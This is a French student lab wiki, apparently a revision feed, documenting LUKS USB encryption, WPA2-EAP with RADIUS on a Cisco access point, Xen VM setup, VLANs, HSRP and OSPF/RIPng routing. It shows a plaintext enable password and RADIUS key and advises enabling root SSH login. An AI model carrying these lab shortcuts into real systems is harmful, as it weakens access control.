&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model &lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_group2&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_group2&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key secretIMA5SC&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid Mycoplasma&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_group2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_group2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;br /&gt;
    ap(config-ssid)#mbssid Guest-mode&lt;br /&gt;
&lt;br /&gt;
 ap(config)#int dot11radio0&lt;br /&gt;
   ap(config-if)#mbssid&lt;br /&gt;
   ap(config-if)#encryption vlan 102 mode ciphers aes-ccm tkip&lt;br /&gt;
   ap(config-if)#ssid &lt;br /&gt;
&lt;br /&gt;
 ap(config)#int dot11radio0.2&lt;br /&gt;
   ap(config-subif)#encapsulation dot1Q 102&lt;br /&gt;
   ap(config-subif)#bridge-group 102&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52169</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52169"/>
				<updated>2020-01-30T10:07:53Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Serveur SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
